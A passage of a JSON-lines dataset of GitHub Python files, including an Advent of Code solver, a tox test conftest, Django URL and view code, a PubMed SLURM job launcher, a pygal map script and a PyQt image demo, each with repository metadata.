uploaded_file)\n stats = mapper(Statistics, statistics, properties={\n 'file': relationship(UploadedFile, lazy='subquery')\n })\n","repo_name":"dawidcdv/stats-back","sub_path":"src/statistics/adapter/orm.py","file_name":"orm.py","file_ext":"py","file_size_in_byte":1141,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"1260511074","text":"from typing import List, Tuple\n\n\nclass Node:\n def __init__(self):\n self.metadata: List[int] = []\n self.children: List[\"Node\"] = []\n\n def iter_metadata(self):\n for m in self.metadata:\n yield m\n for x in self.children:\n for a in x.iter_metadata():\n yield a\n\n def get_value(self):\n if len(self.children) == 0:\n return sum(self.metadata)\n # else:\n value = 0\n for m in self.metadata:\n if m-1 < len(self.children):\n value += self.children[m-1].get_value()\n return value\n\n\ndef parse_input(values: List[int]) -> Tuple[Node, int]:\n \"\"\"\n :param values:\n :return: Tuple [Node, position where node ends\n \"\"\"\n this_node = Node()\n child_nodes = values[0]\n metadata_entries = values[1]\n if child_nodes == 0:\n this_node.metadata = values[2:(2+metadata_entries)]\n return this_node, 2+metadata_entries\n else:\n childnode_start = 2\n for c in range(child_nodes):\n child_node, next_child = parse_input(values[childnode_start:])\n this_node.children.append(child_node)\n childnode_start += next_child\n this_node.metadata = values[childnode_start:childnode_start+metadata_entries]\n return this_node, childnode_start + metadata_entries\n\n\ndef part1():\n text = \"\"\n with open(\"../input/2018/day8.txt\", \"r\") as file:\n text = file.readlines()[0]\n if len(text) == 0:\n return\n values = [int(x) for x in text.split(\" \")]\n rootnode,_ = parse_input(values)\n print(sum(x for x in rootnode.iter_metadata()))\n return rootnode\n\n\ndef part2(rootnode):\n print(rootnode.get_value())\n\n\n#rootnode, _ = parse_input([2,3,0,3,10,11,12,1,1,0,1,99,2,1,1,2])\n#print(sum(x for x in rootnode.iter_metadata()))\n#print(rootnode.get_value())\n\nrootnode = part1()\npart2(rootnode)","repo_name":"seeba8/advent_of_code_2018","sub_path":"src/day8.py","file_name":"day8.py","file_ext":"py","file_size_in_byte":1901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"304619582","text":"import py\nimport tox\nimport os\nimport sys\nfrom py.builtin import print_\nfrom fnmatch import fnmatch\nimport time\nfrom tox._config import parseconfig\nfrom tox._venv import VirtualEnv\n\ndef pytest_configure():\n if 'TOXENV' in os.environ:\n del os.environ['TOXENV']\n if 'HUDSON_URL' in os.environ:\n del os.environ['HUDSON_URL']\n\ndef pytest_report_header():\n return \"tox comes from: %r\" % (tox.__file__)\n\ndef pytest_funcarg__newconfig(request):\n tmpdir = request.getfuncargvalue(\"tmpdir\")\n def newconfig(args, source=None):\n if source is None:\n source = args\n args = []\n s = py.std.textwrap.dedent(source)\n p = tmpdir.join(\"tox.ini\")\n p.write(s)\n old = tmpdir.chdir()\n try:\n return parseconfig(args)\n finally:\n old.chdir()\n return newconfig\n\ndef pytest_funcarg__tmpdir(request):\n tmpdir = request.getfuncargvalue(\"tmpdir\")\n request.addfinalizer(py.path.local().chdir)\n tmpdir.chdir()\n return tmpdir\n\ndef pytest_funcarg__cmd(request):\n return Cmd(request)\n\nclass ReportExpectMock:\n def __init__(self):\n self._calls = []\n self._index = -1\n\n def clear(self):\n self._calls[:] = []\n\n def __getattr__(self, name):\n if name[0] == \"_\":\n raise AttributeError(name)\n\n def generic_report(*args):\n self._calls.append((name,)+args)\n print (\"report %s\" %(args,))\n return generic_report\n\n def expect(self, cat, messagepattern):\n newindex = self._index + 1\n while newindex < len(self._calls):\n lcat, lmsg = self._calls[newindex]\n if lcat == cat and fnmatch(lmsg, messagepattern):\n self._index = newindex\n return\n newindex += 1\n raise AssertionError(\n \"looking for %s(%r), no reports found at >=%d in %r\" %\n (cat, messagepattern, self._index+1, self._calls))\n\nclass pcallMock:\n def __init__(self, args, log, cwd, env=None):\n self.args = args\n self.log = log\n self.cwd = cwd\n self.env = env\n\ndef pytest_funcarg__mocksession(request):\n from tox._cmdline import Session\n class MockSession(Session):\n def __init__(self):\n self._clearmocks()\n #self.config = request.getfuncargvalue(\"newconfig\")([], \"\")\n def getenv(self, name):\n return VirtualEnv(self.config.envconfigs[name], session=self)\n def _clearmocks(self):\n self._pcalls = []\n self.report = ReportExpectMock()\n def make_emptydir(self, path):\n pass\n def pcall(self, args, log, cwd, env=None):\n self._pcalls.append(pcallMock(args, log, cwd, env))\n return MockSession()\n\ndef pytest_funcarg__newmocksession(request):\n mocksession = request.getfuncargvalue(\"mocksession\")\n newconfig = request.getfuncargvalue(\"newconfig\")\n def newmocksession(args, source):\n config = newconfig(args, source)\n mocksession.config = config\n return mocksession\n return newmocksession\n\nclass Cmd:\n def __init__(self, request):\n self.tmpdir = request.getfuncargvalue(\"tmpdir\")\n self.request = request\n current = py.path.local()\n self.request.addfinalizer(current.chdir)\n def chdir(self, target):\n target.chdir()\n\n def popen(self, argv, stdout, stderr, **kw):\n if not hasattr(py.std, 'subprocess'):\n py.test.skip(\"no subprocess module\")\n env = os.environ.copy()\n env['PYTHONPATH'] = \":\".join(filter(None, [\n str(os.getcwd()), env.get('PYTHONPATH', '')]))\n kw['env'] = env\n #print \"env\", env\n return py.std.subprocess.Popen(argv, stdout=stdout, stderr=stderr, **kw)\n\n def run(self, *argv):\n argv = [str(x) for x in argv]\n p1 = self.tmpdir.join(\"stdout\")\n p2 = self.tmpdir.join(\"stderr\")\n print(\"%s$ %s\" % (os.getcwd(), \" \".join(argv)))\n f1 = p1.open(\"wb\")\n f2 = p2.open(\"wb\")\n now = time.time()\n popen = self.popen(argv, stdout=f1, stderr=f2,\n close_fds=(sys.platform != \"win32\"))\n ret = popen.wait()\n f1.close()\n f2.close()\n out = p1.read(\"rb\")\n out = getdecoded(out).splitlines()\n err = p2.read(\"rb\")\n err = getdecoded(err).splitlines()\n def dump_lines(lines, fp):\n try:\n for line in lines:\n py.builtin.print_(line, file=fp)\n except UnicodeEncodeError:\n print(\"couldn't print to %s because of encoding\" % (fp,))\n dump_lines(out, sys.stdout)\n dump_lines(err, sys.stderr)\n return RunResult(ret, out, err, time.time()-now)\n\ndef getdecoded(out):\n try:\n return out.decode(\"utf-8\")\n except UnicodeDecodeError:\n return \"INTERNAL not-utf8-decodeable, truncated string:\\n%s\" % (\n py.io.saferepr(out),)\n\nclass RunResult:\n def __init__(self, ret, outlines, errlines, duration):\n self.ret = ret\n self.outlines = outlines\n self.errlines = errlines\n self.stdout = LineMatcher(outlines)\n self.stderr = LineMatcher(errlines)\n self.duration = duration\n\nclass LineMatcher:\n def __init__(self, lines):\n self.lines = lines\n\n def str(self):\n return \"\\n\".join(self.lines)\n\n def fnmatch_lines(self, lines2):\n if isinstance(lines2, str):\n lines2 = py.code.Source(lines2)\n if isinstance(lines2, py.code.Source):\n lines2 = lines2.strip().lines\n\n from fnmatch import fnmatch\n lines1 = self.lines[:]\n nextline = None\n extralines = []\n __tracebackhide__ = True\n for line in lines2:\n nomatchprinted = False\n while lines1:\n nextline = lines1.pop(0)\n if line == nextline:\n print_(\"exact match:\", repr(line))\n break\n elif fnmatch(nextline, line):\n print_(\"fnmatch:\", repr(line))\n print_(\" with:\", repr(nextline))\n break\n else:\n if not nomatchprinted:\n print_(\"nomatch:\", repr(line))\n nomatchprinted = True\n print_(\" and:\", repr(nextline))\n extralines.append(nextline)\n else:\n assert line == nextline\n\ndef pytest_funcarg__initproj(request):\n \"\"\" create a factory function for creating example projects. \"\"\"\n tmpdir = request.getfuncargvalue(\"tmpdir\")\n def initproj(name, filedefs=None):\n if filedefs is None:\n filedefs = {}\n parts = name.split(\"-\")\n if len(parts) == 1:\n parts.append(\"0.1\")\n name, version = parts\n base = tmpdir.ensure(name, dir=1)\n create_files(base, filedefs)\n if 'setup.py' not in filedefs:\n create_files(base, {'setup.py': '''\n from setuptools import setup\n setup(\n name='%(name)s',\n description='%(name)s project',\n version='%(version)s',\n license='GPLv2 or later',\n platforms=['unix', 'win32'],\n packages=['%(name)s', ],\n )\n ''' % locals()})\n if name not in filedefs:\n create_files(base, {name:\n {'__init__.py': '__version__ = %s' % version}})\n print (\"created project in %s\" %(base,))\n base.chdir()\n return initproj\n\ndef create_files(base, filedefs):\n for key, value in filedefs.items():\n if isinstance(value, dict):\n create_files(base.ensure(key, dir=1), value)\n elif isinstance(value, str):\n s = py.std.textwrap.dedent(value)\n base.join(key).write(s)\n","repo_name":"24x-fi/pytox","sub_path":"tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":7958,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"5754368593","text":"\n\ndef load_instruction(file):\n \"\"\"\n Loads instruction from file\n\n Parameters:\n - file: file to load from, written in name[string] -> cpp_code[string] csv format\n\n Returns:\n - an instruction, i.e. a dictionary in name[string] -> cpp_code[string] format\n \"\"\"\n try:\n import csv\n dict_from_csv = {}\n with open(file, mode='r') as inp:\n reader = csv.reader(inp)\n dict_from_csv = {rows[0]: rows[1] for rows in reader}\n return dict_from_csv\n except Exception:\n import traceback\n print(traceback.print_exc())\n\n\ndef save_instruction(file, object):\n \"\"\"\n Saves instruction to file\n\n Parameters:\n - file: file to save to\n - object: instruction to save, i.e. a dictionary in name[string] -> cpp_code[string] format\n \"\"\"\n try:\n import csv\n f = csv.writer(open(file, 'w'))\n for key, val in object.items():\n f.writerow([key, val])\n except Exception:\n import traceback\n print(traceback.print_exc())\n\n\ndef dataframe_reshaper(tree, instruction, df_range=None, intermediate_tree_save_path=None, vectorization=True):\n \"\"\"\n Reshapes a tree according to an instruction, resulting in pd.DataFrame\n\n Parameters:\n - tree: a ROOT.TTree object\n - instruction: an instruction, a dictionary in name[string] -> cpp_code[string] format, \n that defines tree reshaping\n - save_path: path to save the resulting dataframe to\n - df_range: an iterable of form (begin, end, stride=1). If applied, reshaping is only performed on specified range \n - intermediate_tree_save_path: reshaped tree save path. If not specified, intermediate tree is discarded\n - vectorization: if True, performs checks whether there are columns with vector types, effectively replacing them with lists.\n Disabling this feature is safe if you do not have vectorized data (should be performance cheap anyway), otherwise behaviour is not well defined.\n\n Returns:\n - a pd.DataFrame, filled in accordance to instruction\n \"\"\"\n import ROOT\n import pandas as pd\n rdf = ROOT.RDataFrame(tree)\n for name, cpp_code in instruction.items():\n rdf = rdf.Define(name, cpp_code)\n\n if not df_range == None:\n rdf = rdf.Range(*df_range)\n if not intermediate_tree_save_path == None:\n rdf.Snapshot('reshaped_tree', intermediate_tree_save_path,\n {*instruction.keys()})\n \n df = rdf.AsNumpy(columns=[*instruction.keys()])\n \n if vectorization:\n import numpy as np\n for column in df.keys():\n # check if column is vector-like\n if len(np.array([df[column][0]]).shape) > 1:\n # convert to lists\n df[column] = map(lambda ar : list(ar), df[column])\n \n df = pd.DataFrame(df)\n \n return df\n","repo_name":"Silence2107/MaNNager","sub_path":"libs/reshaper.py","file_name":"reshaper.py","file_ext":"py","file_size_in_byte":2985,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"7056390367","text":"from django.urls import path\r\nfrom . import views\r\nfrom django.contrib.auth.views import LoginView, LogoutView\r\n\r\nurlpatterns = [\r\n path('', views.home),\r\n path('login/', LoginView.as_view(template_name='accounts/login.html'), name=\"login\"),\r\n path('logout/', LogoutView.as_view(template_name='accounts/logout.html'), name=\"logout\"),\r\n path('register/', views.register, name=\"register\"),\r\n path('search/', views.search, name=\"search\"),\r\n path('admin/', views.admin, name=\"admin\"),\r\n path('cart/', views.cart, name=\"cart\"),\r\n path('orders/', views.orders, name=\"orders\"),\r\n path('addBook/', views.addBook, name=\"addBook\"),\r\n path('deleteBook/', views.deleteBook, name=\"deleteBook\"),\r\n path('editBook/', views.editBook, name=\"editBook\"),\r\n path('addUser/', views.addUser, name=\"addUser\"),\r\n path('deleteUser/', views.deleteUser, name=\"deleteUser\"),\r\n path('editUser/', views.editUser, name=\"editUser\"),\r\n path('addOrder/', views.addOrder, name=\"addOrder\"),\r\n path('deleteOrder/', views.deleteOrder, name=\"deleteOrder\"),\r\n path('updateOrder/', views.updateOrder, name=\"updateOrder\"),\r\n path('addOrderedItems/', views.addOrderedItems, name=\"addOrderedItems\"),\r\n]\r\n","repo_name":"ksylve05/PythonBookStore","sub_path":"tutorial/accounts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1214,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"38168155741","text":"import re\n\ntravel_points = 0\nlst = []\n\ntext = input()\nregex = r'=[A-Z][A-Za-z]{2,}=|/[A-Z][A-Za-z]{2,}/'\n\nmatches = re.findall(regex, text)\n\nfor element in matches:\n if '=' in element:\n clean_word = element.strip('=')\n else:\n clean_word = element.strip('/')\n\n lst.append(clean_word)\n travel_points += len(clean_word)\n\ndestinations_output = ', '.join(lst)\n\nprint(f'Destinations: {destinations_output}')\nprint(f'Travel Points: {travel_points}')\n","repo_name":"lubodonchev/SoftUni_Coursework","sub_path":"First_Project/SoftUni Python Fundamentals May 2023/Final Exam Preparation/destination.py","file_name":"destination.py","file_ext":"py","file_size_in_byte":469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"4368254721","text":"\"\"\"Data for quantum decision trees.\n\"\"\"\nfrom abc import ABC, abstractmethod\nimport numpy as np\nimport os\n\n\nclass BDS(ABC): # Binary data set\n \"\"\"Abstract base class for binary data sets.\n \n Parameters\n ----------\n \n **kwargs : Arguments for data loader.\n \"\"\"\n \n def __init__(self, **kwargs):\n self._load(**kwargs)\n self._X = BDS._ensure_array(self._X).astype(bool)\n self._y = BDS._ensure_array(self._y).astype(bool)\n \n @property\n def X(self):\n \"\"\"numpy.ndarray of shape (n_samples,n_features) : Features.\n \"\"\"\n return self._X\n\n @property\n def y(self):\n \"\"\"numpy.ndarray of shape (n_samples,n_labels) : Labels.\n \"\"\"\n return self._y\n \n @staticmethod\n def _ensure_array(a):\n a = np.asarray(a)\n if len(a.shape) == 1:\n a = a.reshape(-1,1)\n return a\n \n def __str__(self):\n return f\"X: {self.X.shape}, y: {self.y.shape}\"\n \n @abstractmethod\n def _load(self, **kwargs):\n raise NotImplementedError \n \nclass BDS_test(BDS):\n \"\"\"Binary data set: XOR test data set consisting of 7 features and 1 label.\n \n Parameters\n ----------\n \n **kwargs :\n ``N`` (``int``) determines the number of data points, defaults to 5.\n \"\"\"\n \n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n \n def _load(self, N=5):\n x1 = [[1,0,0,0,1] + [0]*(N-5)]\n x2 = [[1,1,0,0,1] + [0]*(N-5)]\n x3 = [[0,1,1,0,1] + [0]*(N-5)]\n x4 = [[0 for n in range(N)]]\n x5 = [[0 for n in range(N)]]\n x6 = [[0 for n in range(N)]]\n x7 = [[0 for n in range(N)]]\n y1 = [[(a+b+c)%2 for a,b,c in zip(x1[0],x2[0],x3[0])]]\n X = np.concatenate((x1,x2,x3,x4,x5,x6,x7),axis=0).T\n y = np.concatenate((y1),axis=0).T\n self._X = np.asarray(X)\n self._y = np.asarray(y).reshape(-1,1) \n \n\nclass BDS_tic_tac_toe(BDS):\n \"\"\"Binary data set: Binarized version of the Tic-Tac-Toe Endgame Data Set.\n Each 15-dimensional feature vector represents a Tic-Tac-Toe playfield, the \n corresponding label represents the winning player.\n \n Original source: https://archive.ics.uci.edu/ml/datasets/Tic-Tac-Toe+Endgame\n \n Original creator: David W. Aha (aha@cs.jhu.edu)\n \n Note: Encoding to binary and decoding from binary is realized via \n ``BDS_tic_tac_toe._encode_x`` and \n ``BDS_tic_tac_toe._decode_x``, respectively.\n \n Parameters\n ----------\n \n root : str\n Root directory to load data file ``data/tictactoe/tic-tac-toe.npz``.\n \n **kwargs :\n Unused.\n \"\"\"\n \n def __init__(self, root=\"\", **kwargs):\n self._root = root\n super().__init__(**kwargs)\n \n @staticmethod\n def _encode_x(x, N=15): # ternary -> int -> binary\n \n def x_to_int(x):\n i = 0\n for idx, val in enumerate(x[::-1]):\n i += val*3**idx\n return i\n \n def int_to_b(i, N):\n b = [0 for _ in range(N)]\n bin_str = bin(i)[2:] # bit string\n for idx, val in enumerate(bin_str):\n b[N-len(bin_str)+idx] = int(val)\n #b = b[::-1]\n return b\n \n def convert_x(x):\n return int_to_b(x_to_int(x), N)\n \n x = np.array(x).ravel()\n assert x.size == 9\n return convert_x(x)\n \n @staticmethod\n def _decode_x(x, N=9): # binary -> int -> ternary\n \n def x_to_int(x):\n i = 0\n for idx, val in enumerate(x[::-1]):\n i += val*2**idx\n return i\n \n def int_to_t(i, N):\n t = [0 for _ in range(N)]\n ter_str = np.base_repr(i, base=3)\n for idx, val in enumerate(ter_str):\n t[N-len(ter_str)+idx] = int(val)\n #t = t[::-1]\n return t\n \n def convert_x(x):\n return int_to_t(x_to_int(x), N)\n \n x = np.array(x).ravel()\n assert x.size == 15\n return convert_x(x)\n \n @staticmethod\n def print_playfield(x):\n \"\"\"Print playfield represented by feature vector ``x``.\n \"\"\"\n \n x = np.asarray(x.copy()).ravel()\n if x.size == 9:\n pass\n elif x.size == 15:\n x = BDS_tic_tac_toe._decode_x(x)\n else:\n raise ValueError\n \n x = np.asarray(x, dtype=object).ravel()\n x[x==0] = 'X' # x\n x[x==1] = 'O' # o\n x[x==2] = ' ' # b\n \n print(\"_____\")\n print(\"|{}{}{}|\".format(x[0],x[1],x[2]))\n print(\"|{}{}{}|\".format(x[3],x[4],x[5]))\n print(\"|{}{}{}|\".format(x[6],x[7],x[8]))\n print(\"`````\") \n \n def _load(self, **kwargs):\n data_file = os.path.join(self._root, \"data/tictactoe/tic-tac-toe.npz\")\n data = np.load(data_file)\n self._X = data['X']\n self._y = data['y']\n","repo_name":"RaoulHeese/qtree","sub_path":"src/qtree/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":5048,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"2646883368","text":"from django.urls import path\n#from Aplicaciones.Compra.views.dashboard.views import DashboardView\nfrom Aplicaciones.Compra.views.proveedor.views import *\nfrom Aplicaciones.Compra.views.orden_compra.views import *\nfrom Aplicaciones.Compra.views.compra.views import *\nfrom Aplicaciones.Compra.views.pago.views import *\napp_name = 'Compra'\n\nurlpatterns = [\n #proveedor\n path('proveedor/list/',ProveedorListView.as_view(),name='proveedor_list'),\n path('proveedor/create/',ProveedorCreateView.as_view(),name='proveedor_create'),\n path('proveedor/edit//',ProveedorUpdateView.as_view(),name='proveedor_edit'),\n path('proveedor/delete//',ProveedorDeleteView.as_view(),name='proveedor_delete'),\n #OrdenCompra\n path('ordenCompra/create/',OrdenCompraCreateView.as_view(),name='orden_compra_create'),\n path('ordenCompra/list/', OrdenCompraListView.as_view(), name='orden_compra_list'),\n path('ordenCompra/edit//',OrdenCompraUpdateView.as_view(),name='orden_compra_edit'),\n path('ordenCompra/delete//', OrdenCompraDeleteView.as_view(), name='orden_compra_delete'),\n #pdf con weasyprint\n path('ordenCompra/pdf//', OrdenCPdfView.as_view(), name='ordenCompra_pdf'),\n path('compra/pdf//', CompraPdfView.as_view(), name='compra_pdf'),\n #Compra\n path('create/',CompraCreateView.as_view(),name='compra_create'),\n path('list/',CompraListView.as_view(),name='compra_list'),\n path('edit//',CompraUpdateView.as_view(),name='compra_edit'),\n #Cta_X_pagar\n path('cta_x_pagar/list/',Cta_X_Pagar_ListView.as_view(),name='cta_x_pagar_list'),\n #Pago\n path('pago/create/',PagoCreateView.as_view(),name='pago_create'),\n #html\n path('compra//',CompraView.as_view(), name='compra'),\n\n\n]\n","repo_name":"walterje/SAWA","sub_path":"Aplicaciones/Compra/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1785,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"3957956911","text":"import sys\nfrom collections import deque\n\ndy = [1, -1, 0, 0, 0, 0]\ndx = [0, 0, 1, -1, 0, 0]\ndz = [0, 0, 0, 0, 1, -1]\n\ndef bfs(q):\n days = -1\n\n while q:\n days += 1\n\n for n in range(len(q)):\n z, y, x = q.popleft()\n\n for i in range(6):\n ny, nx, nz = y + dy[i], x + dx[i], z + dz[i]\n if 0 <= ny < N and 0 <= nx < M and 0 <= nz < H and box[nz][ny][nx] == 0:\n box[nz][ny][nx] = box[z][y][x] + 1\n q.append((nz, ny, nx))\n\n for b in box:\n for b1 in b:\n if 0 in b1:\n return -1\n return days\n\nM, N, H = map(int, sys.stdin.readline().split())\nbox = [[list(map(int, sys.stdin.readline().split())) for _ in range(N)] for _ in range(H)]\nq, dist = deque(), [[[0] * M for _ in range(N)] for _ in range(H)]\n\nfor z in range(H):\n for y in range(N):\n for x in range(M):\n if box[z][y][x] == 1:\n q.append((z, y, x))\n\nprint(bfs(q))","repo_name":"hybae430/Baekjoon","sub_path":"7569.py","file_name":"7569.py","file_ext":"py","file_size_in_byte":991,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"24703462873","text":"#!/usr/bin/env python2\n\n# This script will launch instances of download_pubmed_muhaha.py\n\nimport os\nimport pubmed\nfrom utils import read_pmid_groups\n\n# First we need to download full article text\n# Create a pubmed object\nemail = \"vsochat@stanford.edu\"\npm = pubmed.Pubmed(email)\n\n# Get pubmed ids for all articles in database\npc_ids = list(pm.ftp[\"PMCID\"])\n\n# We are going to download them here\ndownload_folder = \"/scratch/PI/dpwall/DATA/PUBMED/articles\"\nemail = \"vsochat@stanford.edu\"\n\n# Submit scripts to download in batches of 100\nstart = 0\niters = len(pc_ids)/100\n\n# Prepare and submit a job for each\nfor i in range(5000,iters):\n start = i*100\n if i != iters:\n end = start + 100\n else:\n end = len(pc_ids)\n jobname = \"pm_%s-%s\" %(start,end)\n filey = open(\".job/%s.job\" % (jobname),\"w\")\n filey.writelines(\"#!/bin/bash\\n\")\n filey.writelines(\"#SBATCH --job-name=%s\\n\" %(jobname))\n filey.writelines(\"#SBATCH --output=.out/%s.out\\n\" %(jobname))\n filey.writelines(\"#SBATCH --error=.out/%s.err\\n\" %(jobname))\n filey.writelines(\"#SBATCH --time=2-00:00\\n\")\n filey.writelines(\"#SBATCH --mem=12000\\n\")\n # Usage : download_pubmed_muhaha.py start end download_folder\n filey.writelines(\"/home/vsochat/python-lapack-blas/bin/python /home/vsochat/SCRIPT/python/brainbehavior/download_pubmed_muhaha.py %s %s %s %s\\n\" % (start,end,download_folder,email))\n filey.close()\n os.system(\"sbatch -p dpwall .job/%s.job\" % (jobname))\n","repo_name":"vsoch/DisorderBehavior","sub_path":"rdoc/3.run_download_pubmed_muhaha.py","file_name":"3.run_download_pubmed_muhaha.py","file_ext":"py","file_size_in_byte":1431,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"37980097754","text":"import json\nimport pygal\nfrom country_codes import get_country_code\nfrom pygal.style import LightColorizedStyle as LCS, RotateStyle as RS\nimport os\n\n\n#carrega os dados em uma lista \nfilename = 'data/population_data.json'\n\nwith open(filename) as f:\n pop_data = json.load(f)\n\n#constroi um dicionario com dados das populacoes\ncc_populations = {}\n\nfor pop_dict in pop_data:\n if pop_dict['Year'] =='2010':\n country = pop_dict['Country Name']\n population = int(float(pop_dict['Value']))\n code = get_country_code(country)\n if code:\n cc_populations[code] = population\n\n#agrupa os paises em tres niveis populacionais\ncc_pops_1, cc_pops_2, cc_pops_3 = {},{},{}\nfor cc, pop in cc_populations.items():\n if pop <10000000:\n cc_pops_1[cc] = pop\n elif pop < 1000000000:\n cc_pops_2[cc] = pop\n else:\n cc_pops_2[cc] = pop\n\n#ve quantos paises estao em cada nivel\nprint(len(cc_pops_1), len(cc_pops_2), len(cc_pops_3))\n\nwm_style = RS('#66ff33', base_style = LCS)\nwm = pygal.maps.world.World(style = wm_style)\nwm.title = 'World Population in 2010, by Country'\nwm.add('0-10m', cc_pops_1)\nwm.add('10m-1bn', cc_pops_2)\nwm.add('>1bn', cc_pops_3)\nfile = 'world_population.svg'\nwm.render_to_file(file)\n\ncommand = 'brave ' + file\nos.system(command)","repo_name":"marcelofontes/Visualizacao","sub_path":"world_population.py","file_name":"world_population.py","file_ext":"py","file_size_in_byte":1293,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"10757254886","text":"from django.shortcuts import render, redirect\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib import messages\nfrom .forms import UserRegisterForm, UserUpdateForm, ProfileUpdateForm\n\n\n# Register View and Register Process\ndef register(request):\n if request.method == \"POST\":\n form = UserRegisterForm(request.POST)\n if form.is_valid():\n form.save()\n username = form.cleaned_data.get('username')\n messages.success(request, f'Your Account has been created. Now you can log in to your account !')\n return redirect('login')\n else:\n messages.error(request, f'{form.errors}')\n else:\n form = UserRegisterForm()\n return render(request, 'users/register.html', {'form': form})\n\n\n# To Access View Only If User Logged In\n@login_required()\ndef profile(request):\n # check for post\n if request.method == 'POST':\n u_form = UserUpdateForm(request.POST, instance=request.user)\n p_form = ProfileUpdateForm(request.POST, request.FILES,\n instance=request.user.profile)\n # instance is used to populate form with existing data of model\n # request.FILES for image fields\n if u_form.is_valid() and p_form.is_valid():\n u_form.save()\n p_form.save()\n messages.success(request, f'Your Profile has been updated succesfully !')\n return redirect('profile')\n else:\n u_form = UserUpdateForm(instance=request.user)\n p_form = ProfileUpdateForm(instance=request.user.profile)\n\n context = {\n 'u_form': u_form,\n 'p_form': p_form,\n }\n return render(request, 'users/profile.html', context)\n","repo_name":"vaibhav0103/DjangoBlog","sub_path":"users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1718,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"8383222106","text":"from PyQt5.QtWidgets import *\r\nfrom PyQt5.QtGui import *\r\nfrom PyQt5.QtCore import *\r\nimport sys\r\n\r\n\r\nclass Example(QWidget):\r\n def __init__(self):\r\n super().__init__()\r\n self.initUI()\r\n\r\n def initUI(self):\r\n self.img = QImage(\"a.jpg\")\r\n self.refImage = QImage(\"b.jpg\")\r\n if self.img.isNull():\r\n print(\"이미지 없음\")\r\n sys.exit(1)\r\n self.iw = self.img.width()\r\n self.ih = self.img.height()\r\n\r\n self.setGeometry(200,200,500,500)\r\n self.setWindowTitle('반사')\r\n self.show()\r\n\r\n # def createReflectedImage(self):\r\n\r\n # self.refImage = QImage(\"b.jpg\")\r\n # self.refImage = QImage(self.iw, self.ih, QImage.Format_ARGB32) # 기존 객체 싸이즈 컴포지션 모드 설정을 위함\r\n # # self.refImage = QImage('b.jpg') # 기존 객체 싸이즈 컴포지션 모드 설정\r\n # painter = QPainter()\r\n # painter.begin(self.refImage)\r\n # painter.drawImage(0, 0, self.img) # 기존 이미지 복사\r\n # painter.setCompositionMode(QPainter.CompositionMode_DestinationIn) # 원본이미지 불투명도\r\n #\r\n # gradient = QLinearGradient(self.iw / 2, 0, self.iw / 2, self.ih) # 선형 그라디언트 ㅇ\r\n # gradient.setColorAt(1, QColor(0, 0, 0)) # 출발지점 검은색\r\n # gradient.setColorAt(0, Qt.transparent) # 도착지점 투���색\r\n # painter.fillRect(0, 0, self.iw, self.ih, gradient) # 원본이미지와 그라디언트가 겹친다\r\n # painter.end()\r\n\r\n def paintEvent(self, event):\r\n painter = QPainter()\r\n painter.begin(self)\r\n self.draw(painter)\r\n painter.end()\r\n\r\n def draw(self,painter):\r\n painter.drawImage(25,15,self.img) # 25, 15 위치에 이미지를 그린다\r\n painter.translate(0, 2*self.ih + 15) # 가로0, 세로높이 2배에 공백 을 더한다) 좌표 중심 변경)\r\n painter.scale(1,-1) # 세로 좌표 방향 반전 아래로\r\n painter.drawImage(125,-50,self.refImage) # painter.drawImage(25,0,self.img)\r\n\r\napp = QApplication([])\r\nex = Example()\r\nsys.exit(app.exec_())\r\n","repo_name":"hacks0921/PyQT","sub_path":"15.이미지 반사시키기.py","file_name":"15.이미지 반사시키기.py","file_ext":"py","file_size_in_byte":2168,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"4232743187","text":"# Книжные магазины предлагают следующие коллекции книг.\ns = '''Магистр - Лермонтов, Достоевский, Пушкин, Тютчев.\nДомКниги - Толстой, Грибоедов, Чехов, Пушкин.\nБукМаркет - Пушкин, Достоевский, Маяковский.\nГалерея - Чехов, Тютчев, Пушкин. '''\n# Определить в каких магазинах можно приобрести книги Маяковского.\nword = 'Маяковский'\n\nd = {}\nfor i in s.split('\\n'): # Перебор циклом введенных строк\n lst = i.replace('.', '').replace(',', '').replace(' -', '').split() # Очистка строки от точек, запятых и тире\n d[lst[0]] = set(lst[1:]) # Заполнение словаря данными\n\nfor i in d: # Цикл, перебирающий ключи словаря\n if word in d[i]: # Проверка наличия слова в множестве\n print(i)\n","repo_name":"Druzinin/Proj_1sem_Druzhinin","sub_path":"PZ_10/PZ_10_1.py","file_name":"PZ_10_1.py","file_ext":"py","file_size_in_byte":1081,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73569320165","text":"from copy import *\n\nboard = {\n 'tl': ' ', 'tm': ' ', 'tr': ' ',\n 'ml': ' ', 'mm': ' ', 'mr': ' ',\n 'bl': ' ', 'bm': ' ', 'br': ' ',\n}\n\nplayer = 'X'\n\ndef print_board(board):\n print(f\"{board['tl']}|{board['tm']}|{board['tr']}\")\n print('-+-+-')\n print(f\"{board['ml']}|{board['mm']}|{board['mr']}\")\n 